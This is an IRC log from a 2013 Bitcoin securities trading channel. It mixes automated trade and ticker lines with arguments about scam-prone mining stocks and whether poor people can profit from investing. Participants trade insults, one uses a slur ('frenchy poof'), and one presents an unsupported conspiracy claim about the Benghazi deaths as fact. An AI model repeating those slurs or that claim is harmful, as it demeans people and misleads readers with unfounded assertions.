0.4883 BTC [+] Aug 19 04:32:41 [BTCTC] [HOSTED-MINING] 1 @ 0.28 BTC Aug 19 04:35:01 thestringpuller: who are you talking to? **** BEGIN LOGGING AT Mon Aug 19 14:43:42 2013 Aug 19 14:44:56 [HAVELOCK] [AM1] 1 @ 3.75000001 BTC [+] Aug 19 14:44:58 [HAVELOCK] [AM1] 1 @ 3.75 BTC [-] Aug 19 14:45:01 [HAVELOCK] [AM1] 1 @ 3.7151 BTC [-] Aug 19 14:45:03 [HAVELOCK] [AM1] 2 @ 3.715 = 7.43 BTC [-] Aug 19 14:46:59 [BTCTC] [DMS.MINING] 100 @ 0.00315 = 0.315 BTC [-] Aug 19 14:47:24 http://www.dailydot.com/business/germany-bitcoin-official-currency/ Aug 19 14:47:27 The Daily Dot - Germany becomes first country to recognize Bitcoin as currency Aug 19 14:49:28 [BTCTC] [ACTIVEMINING] 2 @ 0.005243 = 0.0105 BTC [-] Aug 19 14:49:29 [BTCTC] [ACTIVEMINING] 28 @ 0.005242 = 0.1468 BTC [-] Aug 19 14:49:54 herp./ Aug 19 14:50:24 ;;ticker Aug 19 14:50:25 MtGox BTCUSD ticker | Best bid: 119.73404, Best ask: 119.99999, Bid-ask spread: 0.26595, Last trade: 120.00000, 24 hour volume: 47781.62713596, 24 hour low: 111.77100, 24 hour high: 123.74518, 24 hour vwap: 117.94272 Aug 19 14:50:28 [BTCTC] [ACTIVEMINING] 1 @ 0.005239 BTC [-] Aug 19 14:50:29 [BTCTC] [ACTIVEMINING] 24 @ 0.005228 = 0.1255 BTC [-] Aug 19 14:51:10 [BTCTC] [HOSTED-MINING] 1 @ 0.28 BTC [+] Aug 19 14:51:50 [BTCTC] [DMS.MINING] 50 @ 0.00315 = 0.1575 BTC [-] Aug 19 14:53:45 [BTCTC] [ACTIVEMINING] 50 @ 0.005229 = 0.2615 BTC [+] Aug 19 14:54:56 [BTCTC] [ACTIVEMINING] 56 @ 0.005228 = 0.2928 BTC [-] Aug 19 14:55:46 [BTCTC] [HOSTED-MINING] 2 @ 0.28 = 0.56 BTC [+] Aug 19 14:57:41 [BTCTC] [ACTIVEMINING] 30 @ 0.005319 = 0.1596 BTC [+] Aug 19 14:57:57 [BTCTC] [ACTIVEMINING] 30 @ 0.005319 = 0.1596 BTC [+] Aug 19 14:58:19 [BTCTC] [ACTIVEMINING] 23 @ 0.005322 = 0.1224 BTC [+] Aug 19 14:58:20 [BTCTC] [ACTIVEMINING] 20 @ 0.005322 = 0.1064 BTC [+] Aug 19 15:00:02 [HAVELOCK] [XBOND] [PAID] 1.00978800 BTC to 2`019`576 shares, 50 satoshi per share Aug 19 15:04:48 [HAVELOCK] [XBOND] 29 @ 0.0011709 = 0.034 BTC [+] Aug 19 15:06:11 [HAVELOCK] [XBOND] 7 @ 0.0011709 = 0.0082 BTC [+] Aug 19 15:06:39 [BTCTC] [ASICMINER-PT] 1 @ 3.733 BTC [-] Aug 19 15:06:40 [BTCTC] [ASICMINER-PT] 1 @ 3.732 BTC [-] Aug 19 15:07:18 [HAVELOCK] [LABCO] 1 @ 0.001823 BTC [+] Aug 19 15:08:05 [BTCTC] [ASICMINER-PT] 1 @ 3.801 BTC [+] Aug 19 15:08:14 [BTCTC] [LABCOIN] 20 @ 0.001671 = 0.0334 BTC [-] Aug 19 15:08:15 [BTCTC] [LABCOIN] 80 @ 0.001665 = 0.1332 BTC [-] Aug 19 15:14:37 [MPEX] [S.MPOE] 3050 @ 0.00084779 = 2.5858 BTC [+] Aug 19 15:14:39 [MPEX] [S.MPOE] 1350 @ 0.00084812 = 1.145 BTC [+] Aug 19 15:14:45 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001197 BTC [+] Aug 19 15:15:13 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001197 BTC [+] Aug 19 15:17:36 stamp vs gox http://i.imgur.com/BJS1NrQ.jpg Aug 19 15:18:20 yeah the mkt is a mess. Aug 19 15:18:22 amateurs. Aug 19 15:19:17 meanwhile https://bitcointalk.org/index.php?topic=261465.msg2963130#msg2963130 Aug 19 15:21:21 [HAVELOCK] [AM100] 3 @ 0.0364 = 0.1092 BTC [-] Aug 19 15:21:23 [HAVELOCK] [AM100] 20 @ 0.0363001 = 0.726 BTC [-] Aug 19 15:21:25 [HAVELOCK] [AM100] 10 @ 0.0363 = 0.363 BTC [-] Aug 19 15:21:27 [HAVELOCK] [AM100] 10 @ 0.0362 = 0.362 BTC [-] Aug 19 15:21:29 [HAVELOCK] [AM100] 3 @ 0.03611 = 0.1083 BTC [-] Aug 19 15:21:30 [HAVELOCK] [AM100] 4 @ 0.03610002 = 0.1444 BTC [-] Aug 19 15:23:06 [BTCTC] [ACTIVEMINING] 30 @ 0.005305 = 0.1592 BTC [-] Aug 19 15:23:07 [BTCTC] [ACTIVEMINING] 300 @ 0.0053 = 1.59 BTC [-] Aug 19 15:23:15 [BTCTC] [ACTIVEMINING] 2 @ 0.0053 = 0.0106 BTC [-] Aug 19 15:23:31 https://bitcointalk.org/index.php?topic=277035.msg2963173;topicseen#msg2963173 Aug 19 15:23:38 [DISCUSS]Luke-Jr is standing for election to the board of the Bitcoin Foundation Aug 19 15:24:19 [BTCTC] [HOSTED-MINING] 1 @ 0.28 BTC [+] Aug 19 15:24:52 [HAVELOCK] [HIM] 1 @ 0.205 BTC [+] Aug 19 15:24:55 [HAVELOCK] [HIM] 1 @ 0.2059 BTC [+] Aug 19 15:24:57 [HAVELOCK] [HIM] 1 @ 0.2059 BTC [+] Aug 19 15:24:59 [HAVELOCK] [HIM] 2 @ 0.20599999 = 0.412 BTC [+] Aug 19 15:25:01 [HAVELOCK] [HIM] 5 @ 0.206 = 1.03 BTC [+] Aug 19 15:25:09 seems oddly adequate. the bfl/mtgox foundation should have luke on the board. Aug 19 15:25:45 is this good or bad for "us"? Aug 19 15:26:25 this is the guy who secretley mined altchains on his pool with the agenda to destroy altchains by selling them for btc Aug 19 15:26:36 uber retarded Aug 19 15:26:40 lol k Aug 19 15:27:50 dexX7: ignore the trolls and their lies Aug 19 15:28:02 hey, those were your words Aug 19 15:28:04 hey luke, has the monarch delivered yet ? Aug 19 15:28:12 i couldnt have made it up Aug 19 15:28:21 im too dumb for that shit Aug 19 15:28:46 mircea_popescu: no Aug 19 15:29:07 kakobrekla: liar Aug 19 15:29:19 right. Aug 19 15:30:27 https://bitcointalk.org/index.php?topic=56830.0 Aug 19 15:30:32 Open Letter to Luke-JR About Alt-Coin Attacks Aug 19 15:30:33 course meanwhile tom got scamtagged. Aug 19 15:32:13 What if.. everything they say about BFL is not true and just a FUD campain to slow down the diff acceleration? Aug 19 15:32:21 olonro what if you're an idiot ? Aug 19 15:32:56 Just think about it! Aug 19 15:33:16 you'll need much better shilling. get lost. Aug 19 15:34:21 [MPEX] [S.MPOE] 3300 @ 0.00084565 = 2.7906 BTC [-] Aug 19 15:35:05 Like this? http://upload.wikimedia.org/wikipedia/commons/8/82/Kenyan_20_Shilling_Note.jpg Aug 19 15:36:10 Or this? http://image.shutterstock.com/display_pic_with_logo/66695/66695,1215738181,1/stock-photo-bucket-of-chilled-beers-on-ice-in-an-outdoor-picnic-setting-14752603.jpg Aug 19 15:36:33 [MPEX] [S.MPOE] 11882 @ 0.00084565 = 10.048 BTC [-] Aug 19 15:36:38 I think you are confused. Aug 19 15:38:27 [BTCTC] [ASICMINER-PT] 1 @ 3.798 BTC [-] Aug 19 15:42:08 .moe Aug 19 15:42:08 http://i.imgur.com/cv27HFG.jpg Aug 19 15:43:39 kakobrekla https://bitcointalk.org/index.php?topic=270716.0 Aug 19 15:44:48 uh Aug 19 15:45:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.03797 BTC [+] Aug 19 15:45:52 :/ Aug 19 15:45:59 [BTCTC] [DMS.MINING] 3 @ 0.00329 = 0.0099 BTC [+] Aug 19 15:46:11 deze sonzofabichez r gowing dewn Aug 19 15:46:14 mebbe Aug 19 15:46:17 [BTCTC] [HOSTED-MINING] 35 @ 0.28 = 9.8 BTC [+] Aug 19 15:47:53 [MPEX] [S.MPOE] 302 @ 0.0008418 = 0.2542 BTC [-] Aug 19 15:47:53 what ever happened to the german guy that had his accts flagged and an inverstigation started ? Aug 19 15:47:54 [BTCTC] [ACTIVEMINING] 30 @ 0.005244 = 0.1573 BTC [-] Aug 19 15:47:54 [BTCTC] [ACTIVEMINING] 2 @ 0.005243 = 0.0105 BTC [-] Aug 19 15:47:55 [BTCTC] [ACTIVEMINING] 43 @ 0.005228 = 0.2248 BTC [-] Aug 19 15:47:56 [BTCTC] [ACTIVEMINING] 4 @ 0.005211 = 0.0208 BTC [-] Aug 19 15:47:57 [BTCTC] [ACTIVEMINING] 20 @ 0.00521 = 0.1042 BTC [-] Aug 19 15:47:58 [BTCTC] [ACTIVEMINING] 221 @ 0.005203 = 1.1499 BTC [-] Aug 19 15:48:00 [BTCTC] [ACTIVEMINING] 100 @ 0.005202 = 0.5202 BTC [-] Aug 19 15:48:01 [BTCTC] [ACTIVEMINING] 5 @ 0.005202 = 0.026 BTC [-] Aug 19 15:48:02 [BTCTC] [ACTIVEMINING] 520 @ 0.0052 = 2.704 BTC [-] Aug 19 15:48:05 he was all sangvine about it but i've never heard of him anymore Aug 19 15:48:44 http://www.reddit.com/r/Bitcoin/comments/1k5x8e/to_anyone_still_using_mpex_this_is_the_guy_you/ lol reddit is butthurt Aug 19 15:49:12 [BTCTC] [HOSTED-MINING] 18 @ 0.28 = 5.04 BTC [+] Aug 19 15:49:40 "Why do you care, he's got good opinions. It's stupid of him to think that he had anything to do with stopping the bubble, but let him be. His blog is pretty fun 2 read." Aug 19 15:49:41 hehe that was on /bitcoin's frontpage for a few hours Aug 19 15:49:42 i seee nao Aug 19 15:50:01 peeps gotta learn to think long term. Aug 19 15:50:23 also, why the fuck are they linking some stupid spamsite. Aug 19 15:50:31 https://bitcointalk.org/index.php?topic=271711.0 did you miss that thread, too? Aug 19 15:50:34 https://www.google.com/search?q=barbecuran Aug 19 15:50:36 Why MP is your God. Aug 19 15:50:48 dexX7 lol no, i knew about that one. Aug 19 15:50:53 =D Aug 19 15:52:33 anyweay, the backstory on the barbecuran thing : at the time the notoriously dishonest us propaganda machine was pretending that their benghazi personnel died as a result of some dude publishing youtube videos Aug 19 15:52:55 rather than as a result of them taking out contracts on their own people from the higher bidder. Aug 19 15:53:11 so I made a little thing to test this theory. remarkably, it provoked no fake "muslim unrest". Aug 19 15:53:25 whodda thunk it. Aug 19 15:53:26 [BTCTC] [DMS.PURCHASE] 1000 @ 0.0207 = 20.7 BTC [+] Aug 19 15:54:03 sup mircea_popescu, so i read ur anatomy of a scam Aug 19 15:54:17 u still convinced labcoin is a scam? what about actm? Aug 19 15:54:45 the lot. Aug 19 15:55:20 ok, so.. what are u suggesting? stay in btc? sell all btc for fiat? Aug 19 15:55:28 [BTCTC] [RSM] 10 @ 0.011 = 0.11 BTC [-] Aug 19 15:55:30 [BTCTC] [RSM] 2 @ 0.011 = 0.022 BTC [-] Aug 19 15:55:42 ;;estimate Aug 19 15:55:43 i'm not suggesting anything. you gotta do your own thinking Aug 19 15:55:43 Next difficulty estimate | None based on data since last change | 66574219.0571 based on data for last three days Aug 19 15:55:45 ;;nethash Aug 19 15:55:45 476564.09447 Aug 19 15:55:56 ;;bcstats Aug 19 15:55:58 Current Blocks: 253020 | Current Difficulty: 5.081033904827648E7 | Next Difficulty At Block: 254015 | Next Difficulty In: 995 blocks | Next Difficulty In About: 5 days, 9 hours, 46 minutes, and 57 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Aug 19 15:56:00 that;'s what makes anything powerfdul : lotsa people doing their own thinking Aug 19 15:56:24 well i'm thinking actm has a deal with eAsic, and the chip design is flat cores Aug 19 15:56:27 and it's viable Aug 19 15:56:50 i'm on linux now! (debian) Aug 19 15:56:59 gecko_x8 who's easic. Aug 19 15:57:11 heh Aug 19 15:57:14 n/m then :p Aug 19 15:57:59 [BTCTC] [BTC-GROWTH] 20 @ 0.0999 = 1.998 BTC [-] Aug 19 15:58:09 i did my own 'thinking' and came to the conclusion that you know perfectly fine who eAsic is, you for some reason you choose to play dumb? Aug 19 15:58:18 all in 1 seconds Aug 19 15:58:40 [BTCTC] [DMS.MINING] 1000 @ 0.00312 = 3.12 BTC [-] Aug 19 15:59:35 [BTCTC] [ACTIVEMINING] 30 @ 0.005209 = 0.1563 BTC [+] Aug 19 15:59:36 [BTCTC] [ACTIVEMINING] 4 @ 0.005208 = 0.0208 BTC [-] Aug 19 15:59:38 [BTCTC] [ACTIVEMINING] 480 @ 0.0052 = 2.496 BTC [-] Aug 19 15:59:39 [BTCTC] [ACTIVEMINING] 128 @ 0.00517 = 0.6618 BTC [-] Aug 19 15:59:41 [BTCTC] [ACTIVEMINING] 525 @ 0.005165 = 2.7116 BTC [-] Aug 19 15:59:42 [BTCTC] [ACTIVEMINING] 858 @ 0.005164 = 4.4307 BTC [-] Aug 19 16:02:20 if i had to decide between actm and lab, i Aug 19 16:02:28 i'd chose actm Aug 19 16:02:59 [BTCTC] [TAT.VIRTUALMINE] 38 @ 0.001197 = 0.0455 BTC [+] Aug 19 16:03:00 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001197 BTC [+] Aug 19 16:03:35 [BTCTC] [TAT.VIRTUALMINE] 29 @ 0.001198 = 0.0347 BTC [+] Aug 19 16:03:36 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001198 = 0.1198 BTC [+] Aug 19 16:03:58 [BTCTC] [TAT.VIRTUALMINE] 165 @ 0.001199 = 0.1978 BTC [+] Aug 19 16:06:33 ;;ticker Aug 19 16:06:33 MtGox BTCUSD ticker | Best bid: 118.88105, Best ask: 119.00399, Bid-ask spread: 0.12294, Last trade: 118.77494, 24 hour volume: 47284.31025050, 24 hour low: 111.77100, 24 hour high: 123.74518, 24 hour vwap: 118.04042 Aug 19 16:08:42 does anyone know about bitcoin.de's volume? Aug 19 16:08:59 selling there for ~110 $ doesn't sound that bad Aug 19 16:10:18 according to mircea_popescu, everyone here except him is an idiot, owning bitcoins is stupid and every company listed on btct is a scam. Aug 19 16:10:22 did i get that right? Aug 19 16:10:34 i just wanna check my info Aug 19 16:10:36 It's not btct it's scamexchange Aug 19 16:10:42 oh, right Aug 19 16:10:46 sry Aug 19 16:10:52 1 time Aug 19 16:11:10 gecko_x8 heh. nope. Aug 19 16:11:19 "owning bitcoins is stupid".. hmm Aug 19 16:11:42 mircea_popescu no? that's what i've gathered so far? so what is not accurate? Aug 19 16:11:58 it's not stupid to own btc? Aug 19 16:12:10 is there anyone here that isn't an idiot? Aug 19 16:12:23 is there a company listed on btct that's not a scam? Aug 19 16:12:26 which one is it? Aug 19 16:12:41 plz, enlighten me Aug 19 16:12:45 nothing wrong with owning btc and plenty people here who aren't idiots. Aug 19 16:12:53 ok Aug 19 16:13:06 how did you get that first idea anyway ?! Aug 19 16:13:08 well that's something positive Aug 19 16:13:29 i dunno, just a feeling i've got from your commentary Aug 19 16:13:53 weird. Aug 19 16:14:03 but still, every company on btct is a scam, correct? Aug 19 16:14:14 even AM? Aug 19 16:14:44 there's no practical way to summarize months of discussion in this format. Aug 19 16:14:49 you'll just have to break down and read the logs. Aug 19 16:14:57 k Aug 19 16:16:42 dono't get me wrong, i dunno you and i'm a noob in btc securities.. just trying to figure out all the fuzz about you :) Aug 19 16:17:37 no big deal. Aug 19 16:17:50 [BTCTC] [HOSTED-MINING] 1 @ 0.28 BTC [+] Aug 19 16:18:22 the one beef with am is they wouldn't make a proper contract, instead letting a bunch of people make PTs on basically their own. this is very severable tyo the benefit of AM, which sinks the deal for me. Aug 19 16:18:50 on the other hand they have paid a lot of BTC in dividends, they do have a viable business model which is operational and so on. Aug 19 16:18:53 [HAVELOCK] [AM100] 21 @ 0.0368994 = 0.7749 BTC [+] Aug 19 16:18:54 it's a tough call. Aug 19 16:18:55 [HAVELOCK] [AM100] 1 @ 0.0369 BTC [+] Aug 19 16:18:57 [HAVELOCK] [AM100] 1 @ 0.037 BTC [+] Aug 19 16:19:13 but it being a tough call puts them leaps above all the other shits, where it's no tough call at all. Aug 19 16:19:28 [BTCTC] [ACTIVEMINING] 14 @ 0.005314 = 0.0744 BTC [+] Aug 19 16:19:58 right.. well imo it's because of the wild west nature of btc land.. not sure if i favor a wall street type of nazi regulations enforcement model in btc-land Aug 19 16:20:10 that's never been contemplated. Aug 19 16:20:19 nobody is forced to buy PT's Aug 19 16:20:32 yes, but the PT ops may find themselves in the situation of chaang-noi. Aug 19 16:20:52 but they do serve a purpouse, for ex i can buy AM PT shares without paying the ridiculous registration fee of mpex Aug 19 16:21:09 only if you're tiny volume. Aug 19 16:21:18 yes i agree, it's a lot of work to commit yourself to without proper compensation Aug 19 16:21:44 but som eppl do it, and it's work out reasonably well so far Aug 19 16:22:01 this "so far" is your problem. Aug 19 16:22:05 with TAT for ex, i think he's doing a great service to the community Aug 19 16:22:12 if you start cooking meth you will probably think you are doing ok "So far" Aug 19 16:22:13 ok Aug 19 16:22:16 for the first three to six months. Aug 19 16:22:19 right Aug 19 16:22:36 but i AM tiny volume Aug 19 16:22:45 and can't afford the mpex fee Aug 19 16:22:55 this doesn't mean your survival expectation isn't about 14 months. it is, just, average meth head doesn't have the wits to see that far out into the future. Aug 19 16:22:56 so what's the problem? Aug 19 16:23:05 only rich ppl should apply, the rest should die? Aug 19 16:23:11 30 btc to just to trade right? Aug 19 16:23:25 gecko_x8 poor people don't normally make money out of their money. Aug 19 16:23:33 they normally lose it to grafters. Aug 19 16:24:23 by 'normally' you are referring to the worthless fiat paper money world? where wall street hyenas rob the common man of his savings? Aug 19 16:24:37 this is the tradition you are referring too? Aug 19 16:24:45 i thought btc was all about getting rid of that Aug 19 16:24:58 it was the same in 1600s low countries, and in 1100s serene republic. Aug 19 16:25:00 and treating a man with 0.1 btc the same as a man with 1000 btc Aug 19 16:25:03 [MPEX] [S.MPOE] 5950 @ 0.00084812 = 5.0463 BTC [+] Aug 19 16:25:04 it's been the same in the arab world, and in china. Aug 19 16:25:16 poor people don't realise capital gains. it's a fact of life. Aug 19 16:25:28 but but.. Aug 19 16:25:36 it has nothing to do with btc, and there's never going to be an outside solution to this. Aug 19 16:25:39 btc is not magic Aug 19 16:25:39 the problem is inside. Aug 19 16:25:49 if a poor man bought actm secondary ipo with 1 btc Aug 19 16:25:51 and sold for 3.8 btc Aug 19 16:25:59 people who can't manage or understand fiat won't gain magical understanding because "bitcoin" Aug 19 16:25:59 it's not within his rights to do so? Aug 19 16:26:04 if a poor man bought a lottery ticket with .1 btc Aug 19 16:26:08 and made 21mn btc Aug 19 16:26:11 he'd still be a poor man. Aug 19 16:26:20 oh man Aug 19 16:26:21 surely it's within his right. why not ? Aug 19 16:26:28 well Aug 19 16:26:50 then he invests this 3.8 btc in something that goes up 100,000 percent Aug 19 16:26:56 still a poor man? Aug 19 16:27:01 difference between poor and rich is that if you take a rich guy's money away, he'll get back, if you give a poor guy money, he'll be poor again in no time Aug 19 16:27:01 worth nothing? Aug 19 16:27:07 look, we're in different trades. you do literature, i do finance. Aug 19 16:27:15 :) Aug 19 16:27:17 k k Aug 19 16:27:22 just checking man :p Aug 19 16:27:25 look at lottery winners, and compare them to hedge fund managers Aug 19 16:27:32 for my own curiosity, review rthe results of fiat world lottery winners. Aug 19 16:27:34 but this is not lottery Aug 19 16:27:34 are they rich ? Aug 19 16:27:38 this is btc Aug 19 16:27:42 look at people who caught a windfall through sports. are they rich ? Aug 19 16:27:48 did hollyfield die a rich man ? Aug 19 16:27:51 how about tyson ? Aug 19 16:27:55 but this is a new field Aug 19 16:28:07 you are comparing it to the baby boomer built syste Aug 19 16:28:09 m Aug 19 16:28:10 well, you're right, it's not lottery. it's btc. the problem is you try to interract with it on the lottery model. Aug 19 16:28:21 nah Aug 19 16:28:31 btc is perverse enough to let that appear to work, at least for a little bit. Aug 19 16:28:32 i been sitting on my btc for a long time Aug 19 16:28:42 just wanted them to earn some dividends Aug 19 16:28:44 but the idea that somehow btc is friendlier than fiat is ridiculous on its face. Aug 19 16:28:51 that's not the same as buying lottery tickets Aug 19 16:28:52 btc don't "earn dividends" Aug 19 16:29:08 well, depends what you invest in. Aug 19 16:29:14 they may appreciate, or you can invest them in an asset that pays dividends Aug 19 16:29:22 right Aug 19 16:29:25 and so i have done Aug 19 16:29:30 you can also do that with dollars Aug 19 16:29:36 no magic in btc Aug 19 16:29:40 i'm just trying to figure out why i'm 'poor and stupid' for doing so Aug 19 16:30:03 its a good investment, or at least a portion of a portfolio, IMHO Aug 19 16:30:03 where are you quoting from ? Aug 19 16:30:19 nowhere Aug 19 16:30:32 just the feeling i get from your comments here Aug 19 16:30:38 gecko_x8: i think the implication is: investing in "scam companies" = "playing lottery".. might work today, tomorrow, even the next weeks, but.. Aug 19 16:30:57 you're saying the man with 0.1 btc is poor and stupid, and is trying to play the lottery here on btct Aug 19 16:31:13 and that he should not, because he will never succeed, and he will always remain poor and stupid Aug 19 16:31:21 but i disagree. Aug 19 16:31:23 its not about the amt, its about the mentality Aug 19 16:31:46 some look at buying a bitcoin like buying a lotto ticket "if it goes to a million dollars..." Aug 19 16:31:54 [BTCTC] [BFMINES] 18 @ 0.0015 = 0.027 BTC [+] Aug 19 16:32:04 others look at the "new hot stock" like a lotto ticket Aug 19 16:32:13 mircea_popescu you are saying that poor ppl should never even try to escape their predicament, but just accept their fate Aug 19 16:32:18 [BTCTC] [BTC-GROWTH] 1 @ 0.0962 BTC [-] Aug 19 16:32:25 i don't think that is what he is saying at all Aug 19 16:32:29 all while 'rich' ppl should pay you 30 btc just to trade on your exchange Aug 19 16:32:33 i think he is saying they should take the time to learn Aug 19 16:32:34 and everyone else is an idiot Aug 19 16:32:34 gecko_x8 no, i'm not saying that at all. Aug 19 16:32:51 for example, you can trade through a broker like coinbr...1 coin deposit is all that is required Aug 19 16:33:03 that is better for smaller retail investors Aug 19 16:33:11 i am saying that the expectation for something OUTSIDE to extract them from their predicament is 1. baseless and 2. a security hole in their software. Aug 19 16:33:21 [BTCTC] [DMS.MINING] 27 @ 0.00329 = 0.0888 BTC [+] Aug 19 16:33:22 which is obviously being exploited all the time. Aug 19 16:33:26 ^^ Aug 19 16:34:05 but.. so if you are poor, you should never attempt to fix that by trading? Aug 19 16:34:14 how about jesse livermoore then? Aug 19 16:34:19 you get people come here all the time going "hey guyse, you're all buying X scam right" ? Aug 19 16:34:22 he should never have even tried? Aug 19 16:34:33 [BTCTC] [BTC-GROWTH] 5 @ 0.1 = 0.5 BTC [+] Aug 19 16:34:37 poor people are conditioned to follow the crowd. and the crowd is usually a crowd of sheep, being more or less methodically exploited. Aug 19 16:34:56 if you are buying something because you "heard it was hot" think about it Aug 19 16:34:57 gecko_x8 we are discussing statistics. there's no room for anecdote in there. Aug 19 16:35:05 but if a poor person attempts to not follow the crowd by getting into a risky asset like btc, that's wrong? Aug 19 16:35:11 even if he would succeed? Aug 19 16:35:16 are you SO savvy and so "in the know" that you have an edge in this information? Aug 19 16:35:40 if not, then I would say that you are going to be the guy who is late to the party (the one holding the bag) Aug 19 16:35:53 gecko_x8 but they aren't NOT following the crowd. they ARE following the crowd. Aug 19 16:36:00 the only reason they're going in is because they perceive others are. Aug 19 16:36:08 right Aug 19 16:36:08 because if you take that away, there's literally nothing. Aug 19 16:36:19 no revenue, no business model, no history of the operator, nothing. Aug 19 16:36:32 [BTCTC] [DMS.MINING] 86 @ 0.00329 = 0.2829 BTC [+] Aug 19 16:36:34 well i'm not that poor, but btc has been one of my best investments ever since i started buying at 17 EUR Aug 19 16:36:43 nothing wrong witjh that. Aug 19 16:36:44 and actm i bought at 0.0025 Aug 19 16:36:51 so i'm happy Aug 19 16:36:51 consider : when doog made his site I supported it. Aug 19 16:36:58 so did bugpowder, so did most of the vets in thuis channel. Aug 19 16:37:14 have they supported it because i have ? perhaps, maybe, to some degree. as a shortcut, cause they know i can think. Aug 19 16:37:24 [BTCTC] [TAT.ASICMINER] 15 @ 0.03762 = 0.5643 BTC [-] Aug 19 16:37:27 have i supported it because bug did ? not really, but i certainly REVIEWED it because he mentuioned it. Aug 19 16:37:37 but doog had a history. a long history. Aug 19 16:38:07 [BTCTC] [DMS.MINING] 30 @ 0.00329 = 0.0987 BTC [+] Aug 19 16:38:15 consider http://trilema.com/2013/i-have-a-problem-which-i-dont-know-how-to-resolve-so-do-you/ Aug 19 16:38:56 [BTCTC] [DMS.MINING] 3 @ 0.00329 = 0.0099 BTC [+] Aug 19 16:42:00 [HAVELOCK] [XBOND] 2 @ 0.0011709 = 0.0023 BTC [+] Aug 19 16:42:12 [BTCTC] [ASICMINER-PT] 1 @ 3.789 BTC [-] Aug 19 16:42:25 .00117?! Aug 19 16:42:39 lol what Aug 19 16:42:59 ok. now tell me again about how poor people are doing research and coming out ahead by investing. Aug 19 16:43:14 [BTCTC] [ASICMINER-PT] 1 @ 3.791 BTC [+] Aug 19 16:43:18 this is one of those guys who walks the right side, and all the info is published. Aug 19 16:43:26 how hard would it be for scammers to scam, in thsi context ? Aug 19 16:43:44 [MPEX] [S.MPOE] 3400 @ 0.00084872 = 2.8856 BTC [+] Aug 19 16:44:18 [BTCTC] [BASIC-MINING] 1 @ 0.2999 BTC [+] Aug 19 16:44:20 [BTCTC] [BASIC-MINING] 1 @ 0.2999 BTC [+] Aug 19 16:48:20 [BTCTC] [ACTIVEMINING] 68 @ 0.005409 = 0.3678 BTC [+] Aug 19 16:48:21 [BTCTC] [ACTIVEMINING] 17 @ 0.00541 = 0.092 BTC [+] Aug 19 16:48:31 [BTCTC] [TAT.ASICMINER] 4 @ 0.03702 = 0.1481 BTC [-] Aug 19 16:49:56 [BTCTC] [TAT.ASICMINER] 33 @ 0.03701 = 1.2213 BTC [-] Aug 19 16:49:58 [BTCTC] [TAT.ASICMINER] 50 @ 0.03701 = 1.8505 BTC [-] Aug 19 16:49:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.03701 BTC [-] Aug 19 16:50:00 [BTCTC] [TAT.ASICMINER] 8 @ 0.03701 = 0.2961 BTC [-] Aug 19 16:53:23 [BTCTC] [LABCOIN] 3 @ 0.001692 = 0.0051 BTC [+] Aug 19 16:53:39 [BTCTC] [ACTIVEMINING] 30 @ 0.005419 = 0.1626 BTC [+] Aug 19 16:54:10 [BTCTC] [LABCOIN] 2 @ 0.001692 = 0.0034 BTC [+] Aug 19 16:54:12 [BTCTC] [ACTIVEMINING] 38 @ 0.005419 = 0.2059 BTC [+] Aug 19 16:54:45 [BTCTC] [ASICMINER-PT] 1 @ 3.792 BTC [+] Aug 19 16:56:00 [BTCTC] [ACTIVEMINING] 30 @ 0.005418 = 0.1625 BTC [-] Aug 19 16:56:42 [BTCTC] [ACTIVEMINING] 38 @ 0.005418 = 0.2059 BTC [-] Aug 19 16:58:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.03755 = 0.0751 BTC [+] Aug 19 17:01:29 mircea_popescu i was referring to the book 'reminiscences of a stock operator', which is avail for download on the net Aug 19 17:01:41 it's the story of Jesse Livermoore Aug 19 17:02:04 and it has a lot of similarities to the current btc environment Aug 19 17:02:10 perhaps. Aug 19 17:02:21 Livermoore started out in the 'bucket shops' Aug 19 17:02:29 in the 1920 americas Aug 19 17:02:47 if you haven't read it i highly recommend it Aug 19 17:03:49 Livermoore used to trade with Bert Seligman Aug 19 17:04:10 who is James Sinclair's father Aug 19 17:04:41 err Jim Sinclair.. Aug 19 17:04:49 dunno if it's James or Jim Aug 19 17:04:56 yes dude, i know. made a fortune on the dip, lost most of it, Aug 19 17:05:11 broke up with his wife cause she wouldn't pawn her jools, it's well known. Aug 19 17:05:29 k k Aug 19 17:05:35 however, the book you're thinking about wasn;'t written by him, Aug 19 17:05:40 i know Aug 19 17:05:44 [BTCTC] [ASICMINER-PT] 1 @ 3.731 BTC [-] Aug 19 17:05:44 it was wriotten by some frenchy poof ABOUT him Aug 19 17:05:51 i know that Aug 19 17:05:57 it's still an important book Aug 19 17:06:34 [BTCTC] [ASICMINER-PT] 1 @ 3.73 BTC [-] Aug 19 17:06:34 [BTCTC] [ASICMINER-PT] 1 @ 3.72 BTC [-] Aug 19 17:06:36 [BTCTC] [ASICMINER-PT] 1 @ 3.71 BTC [-] Aug 19 17:06:37 [BTCTC] [ASICMINER-PT] 2 @ 3.701 = 7.402 BTC [-] Aug 19 17:07:01 [BTCTC] [ASICMINER-PT] 1 @ 3.701 BTC [-] Aug 19 17:07:14 [BTCTC] [ASICMINER-PT] 1 @ 3.7 BTC [-] Aug 19 17:07:17 [BTCTC] [ASICMINER-PT] 1 @ 3.7 BTC [-] Aug 19 17:07:20 [BTCTC] [ASICMINER-PT] 2 @ 3.7 = 7.4 BTC [-] Aug 19 17:07:21 [BTCTC] [ASICMINER-PT] 2 @ 3.681 = 7.362 BTC [-] Aug 19 17:07:23 [BTCTC] [ASICMINER-PT] 4 @ 3.68 = 14.72 BTC [-] Aug 19 17:09:24 [BTCTC] [ASICMINER-PT] 1 @ 3.676 BTC [-] Aug 19 17:09:26 [BTCTC] [ASICMINER-PT] 1 @ 3.675 BTC [-] Aug 19 17:09:27 [BTCTC] [ASICMINER-PT] 1 @ 3.675 BTC [-] Aug 19 17:09:38 "It’s no matter if a student comes to the conclusion that 3 x 4 = 11. So long as they can explain how they made this erroneous determination they go home with an ‘A’." Aug 19 17:09:40 too good this shit. Aug 19 17:09:57 [BTCTC] [ASICMINER-PT] 1 @ 3.674 BTC [-] Aug 19 17:10:14 [BTCTC] [LABCOIN] 3 @ 0.001691 = 0.0051 BTC [-] Aug 19 17:10:16 [BTCTC] [LABCOIN] 9 @ 0.001692 = 0.0152 BTC [+] Aug 19 17:10:39 